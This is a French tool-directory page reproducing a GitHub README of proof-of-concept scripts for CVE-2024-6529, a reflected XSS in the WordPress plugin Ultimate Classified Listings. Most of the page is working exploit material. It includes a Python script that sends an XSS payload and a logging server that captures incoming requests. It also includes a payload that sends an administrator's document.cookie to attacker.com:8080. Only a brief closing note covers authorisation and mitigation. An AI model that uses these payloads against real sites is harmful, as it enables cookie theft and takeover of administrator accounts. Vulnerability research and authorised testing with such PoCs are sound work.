Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-6529 — Scripts de preuve de concept démontrant un XSS réfléchi dans le plugin WordPress Ultimate Classified Listings et le vol de cookies administrateur via des charges utiles conçues et un serveur de journalisation. | Kitploit
Outils/GitHubGitHub/abdurahmon3236/cve-2024-6529
Analyse des VulnérabilitésExploitationExploitation d'Applications WebHameçonnageTests d'IntrusionIngénierie Sociale
GitHubabdurahmon3236/cve-2024-6529

CVE-2024-6529

Scripts de preuve de concept démontrant un XSS réfléchi dans le plugin WordPress Ultimate Classified Listings et le vol de cookies administrateur via des charges utiles conçues et un serveur de journalisation.

Voir le dépôt
19il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de Concept (PoC) pour les vulnérabilités dans les plugins WordPress

Ce dépôt contient des scripts de Preuve de Concept (PoC) pour diverses vulnérabilités découvertes dans différents plugins WordPress. Ces scripts montrent comment les attaquants peuvent exploiter ces vulnérabilités pour effectuer des actions malveillantes.

Table des matières

  • Vulnérabilités couvertes
  • Configuration et utilisation
    • XSS Réfléchi dans le plugin Ultimate Classified Listings
    • Vol de cookies via XSS
  • Considérations importantes

Vulnérabilités couvertes

  1. Cross-Site Scripting (XSS) Réfléchi dans le plugin Ultimate Classified Listings

    • Une vulnérabilité dans le plugin WordPress Ultimate Classified Listings antérieur à la version 1.4 permet aux attaquants d'exécuter du JavaScript arbitraire en injectant des scripts malveillants via des paramètres non nettoyés.
  2. Vol de cookies via XSS

    • Montre comment un attaquant peut exploiter la vulnérabilité XSS réfléchie pour voler les cookies des utilisateurs à privilèges élevés, comme les administrateurs, en envoyant les cookies à un serveur malveillant.

Configuration et utilisation

XSS Réfléchi dans le plugin Ultimate Classified Listings

Cette PoC montre comment exploiter la vulnérabilité XSS réfléchie dans le plugin Ultimate Classified Listings.

  1. Identifier le paramètre vulnérable :

    • Supposons que le paramètre vulnérable soit search dans l'URL http://example.com/classifieds.
  2. Créer une URL malveillante :

    • L'URL malveillante peut inclure une charge utile pour exécuter une boîte de dialogue d'alerte :
      http://example.com/classifieds?search=<script>alert('XSS')</script>
      
  3. Exécuter le script PoC :

    • Enregistrez le script suivant sous xss_poc.py et exécutez-le.
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Changez ceci pour l'URL du site cible
    payload = "<script>alert('XSS')</script>"  # Charge utile XSS
    
    def trigger_xss():
        # Construire l'URL malveillante
        malicious_url = f"{target_url}?search={payload}"
    
        # Envoyer une requête GET à l'URL malveillante
        response = requests.get(malicious_url)
    
        # Vérifier si la charge utile est reflétée dans la réponse
        if payload in response.text:
            print("[+] La charge utile XSS est reflétée dans la réponse.")
            print("[+] URL malveillante :", malicious_url)
        else:
            print("[-] La charge utile XSS n'est pas reflétée dans la réponse.")
    
    if __name__ == "__main__":
        trigger_xss()
    

Vol de cookies via XSS

Cette PoC montre comment un attaquant peut exploiter la vulnérabilité XSS réfléchie pour voler les cookies des utilisateurs à privilèges élevés.

  1. Configurer un serveur malveillant :

    • Enregistrez le script suivant sous malicious_server.py et exécutez-le pour démarrer un serveur qui enregistre les requêtes entrantes (y compris les cookies).
    from http.server import BaseHTTPRequestHandler, HTTPServer
    import logging
    
    class RequestHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            logging.info(f"Requête reçue : {self.headers}")
            self.send_response(200)
            self.end_headers()
    
    def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
        logging.basicConfig(filename='server.log', level=logging.INFO)
        server_address = ('', port)
        httpd = server_class(server_address, handler_class)
        logging.info(f'Démarrage du serveur sur le port {port}...')
        httpd.serve_forever()
    
    if __name__ == "__main__":
        run()
    
  2. Créer une charge utile pour voler les cookies :

    • Créez une charge utile qui envoie les cookies de l'administrateur au serveur malveillant :
      http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
      
  3. Exécuter le script PoC :

    • Enregistrez le script suivant sous steal_cookies_poc.py et exécutez-le.
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Changez ceci pour l'URL du site cible
    attacker_server = "http://attacker.com:8080"  # Changez ceci pour l'URL de votre serveur malveillant
    payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
    
    def trigger_xss():
        # Construire l'URL malveillante
        malicious_url = f"{target_url}?search={payload}"
    
        # Envoyer une requête GET à l'URL malveillante
        response = requests.get(malicious_url)
    
        # Vérifier si la charge utile est reflétée dans la réponse
        if payload in response.text:
            print("[+] La charge utile XSS est reflétée dans la réponse.")
            print("[+] URL malveillante :", malicious_url)
        else:
            print("[-] La charge utile XSS n'est pas reflétée dans la réponse.")
    
    if __name__ == "__main__":
        trigger_xss()
    

Considérations importantes

  • Autorisations : Assurez-vous d'avoir l'autorisation explicite de tester ces vulnérabilités sur le site cible. L'accès non autorisé est illégal et contraire à l'éthique.
  • Environnement de test : Effectuez ces tests dans un environnement contrôlé pour éviter d'impacter les systèmes de production.
  • Atténuation : Mettez à jour le plugin Ultimate Classified Listings vers la version 1.4 ou ultérieure. Nettoyez et échappez toujours les entrées utilisateur avant de les inclure dans la sortie.

Ces PoC montrent comment un attaquant pourrait exploiter des vulnérabilités dans des plugins WordPress pour effectuer des actions malveillantes. Gardez toujours vos logiciels à jour et suivez les meilleures pratiques de sécurité pour prévenir de telles vulnérabilités.

Télécharger l’outil